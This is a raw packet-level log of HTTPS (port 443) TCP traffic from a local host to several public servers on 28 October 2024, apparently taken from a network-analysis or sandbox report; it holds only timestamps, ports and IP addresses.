                                                                                                                                                Oct 28, 2024 17:48:31.121205091 CET49781443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.121226072 CET4434978135.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.122296095 CET4434978135.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.122385025 CET49781443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.122812986 CET49781443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.122874022 CET4434978135.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.122968912 CET49781443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.122976065 CET4434978135.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.133625031 CET49780443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.133645058 CET4434978035.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.165616989 CET49781443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.181638956 CET49780443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.244369030 CET4434978035.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.244721889 CET49780443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.244801998 CET4434978035.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.244874001 CET49780443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.245218039 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.245260954 CET4434978235.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.245343924 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.245646000 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.245661020 CET4434978235.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.267173052 CET4434978135.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.267416000 CET49781443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.267453909 CET4434978135.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.267519951 CET49781443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.267761946 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.267791033 CET4434978335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.267858982 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.268106937 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.268116951 CET4434978335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.884509087 CET4434978335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.885051966 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.885065079 CET4434978335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.885092020 CET4434978235.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.885358095 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.885380983 CET4434978235.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.886094093 CET4434978335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.886168003 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.886645079 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.886702061 CET4434978335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.886800051 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.886825085 CET4434978335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.886843920 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.888807058 CET4434978235.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.888874054 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.889328957 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.889436007 CET4434978235.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.889455080 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.931345940 CET4434978335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.931673050 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.931673050 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:31.931694031 CET4434978235.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:31.979612112 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:32.032347918 CET4434978235.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:32.032566071 CET4434978335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:32.032686949 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:32.032764912 CET4434978235.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:32.032807112 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:32.032830000 CET49782443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:32.032860041 CET4434978335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:32.032916069 CET49783443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:48:32.730773926 CET49784443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:48:32.730808973 CET44349784142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:32.730917931 CET49784443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:48:32.731209040 CET49784443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:48:32.731223106 CET44349784142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:33.600375891 CET44349784142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:33.600848913 CET49784443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:48:33.600878000 CET44349784142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:33.602072954 CET44349784142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:33.602385998 CET49784443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:48:33.602575064 CET44349784142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:33.656693935 CET49784443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:48:43.669117928 CET44349784142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:43.669188023 CET44349784142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:43.669276953 CET49784443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:48:44.440196991 CET49784443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:48:44.440212011 CET44349784142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:11.557342052 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:11.557383060 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:11.557459116 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:11.557751894 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:11.557765961 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.166126013 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.166518927 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.166536093 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.166820049 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.167269945 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.167330980 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.167443037 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.167526960 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.167555094 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.167675972 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.167706013 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.693325043 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.693406105 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.693514109 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.693528891 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.693562984 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.693598986 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.693631887 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.693640947 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.693660021 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.693779945 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.721071005 CET49786443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.721088886 CET44349786104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.765327930 CET49787443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.765362978 CET44349787104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.765460968 CET49787443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.765703917 CET49787443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:12.765726089 CET44349787104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.778949022 CET49788443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:12.778999090 CET44349788188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.779074907 CET49788443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:12.782943964 CET49788443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:12.782958984 CET44349788188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.785032988 CET49789443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:12.785077095 CET44349789188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.785146952 CET49789443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:12.787162066 CET49789443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:12.787177086 CET44349789188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.385898113 CET44349787104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.386253119 CET49787443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:13.386280060 CET44349787104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.386647940 CET44349787104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.387073040 CET49787443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:13.387156010 CET44349787104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.387247086 CET49787443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:13.410779953 CET44349789188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.410857916 CET44349788188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.411170959 CET49789443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.411185980 CET44349789188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.411274910 CET49788443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.411297083 CET44349788188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.414769888 CET44349789188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.414812088 CET44349788188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.414840937 CET49789443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.414896011 CET49788443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.415221930 CET49789443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.415256023 CET49789443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.415328026 CET49789443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.415458918 CET44349789188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.415518999 CET49789443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.415755033 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.415785074 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.415846109 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.416196108 CET49788443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.416212082 CET49788443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.416260958 CET49788443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.416275024 CET44349788188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.416327000 CET49788443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.416584015 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.416614056 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.416672945 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.416897058 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.416908026 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.417103052 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:13.417117119 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.431345940 CET44349787104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.533334017 CET44349787104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.533415079 CET44349787104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:13.533564091 CET49787443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:13.534104109 CET49787443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:13.534123898 CET44349787104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.052483082 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.052822113 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:14.052845955 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.054485083 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.054563046 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:14.055893898 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:14.055975914 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.056056976 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:14.056063890 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.080406904 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.080626965 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:14.080637932 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.084181070 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.084361076 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:14.084522009 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:14.084633112 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.105726957 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:14.137809992 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:14.137820005 CET44349791188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:14.185823917 CET49791443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.132198095 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.132308960 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.132345915 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.132385969 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.132397890 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.132419109 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.132443905 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.132498980 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.132541895 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.132544041 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.132551908 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.132596016 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.132603884 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.188735008 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.188765049 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.232741117 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.251705885 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.251776934 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.251811028 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.251830101 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.251849890 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.251890898 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.251950979 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.252065897 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.252110004 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.263941050 CET49790443192.168.2.16188.114.96.3
                                                                                                                                                Oct 28, 2024 17:49:15.263959885 CET44349790188.114.96.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.331934929 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:15.331971884 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.332134008 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:15.334096909 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:15.334142923 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.334211111 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:15.335391045 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:15.335411072 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.335469961 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:15.335705996 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:15.335721016 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.335863113 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:15.335886955 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.336018085 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:15.336031914 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.943542004 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.944071054 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:15.944096088 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.946954966 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.947056055 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:15.947525024 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:15.947711945 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:15.947717905 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.947738886 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.948174000 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.948399067 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:15.948432922 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.949182987 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.949399948 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:15.949426889 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.949428082 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.949496031 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:15.950747967 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:15.950814009 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.950934887 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:15.950952053 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.953002930 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.953083992 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:15.953505039 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:15.953671932 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:15.953684092 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.995332956 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.995830059 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:15.995830059 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:15.995831966 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:15.995840073 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.995847940 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.043740988 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.046365976 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.081279993 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.091706038 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.091859102 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.091928959 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.092466116 CET49792443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.092483997 CET44349792104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.094501972 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.094613075 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.094719887 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.094996929 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.095033884 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.118696928 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.119046926 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.119081974 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.119108915 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.119134903 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.119179964 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.119692087 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.119798899 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.119848967 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.119858980 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.120125055 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.120152950 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.120174885 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.120183945 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.120238066 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.123744011 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.199259043 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.199291945 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.199362993 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.199404001 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.199441910 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.199498892 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.199498892 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.199498892 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.199522018 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.199556112 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.199568987 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.201402903 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.201411009 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.201452971 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.201487064 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.201493979 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.201515913 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.201540947 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.235703945 CET44349794104.17.25.14192.168.2.16
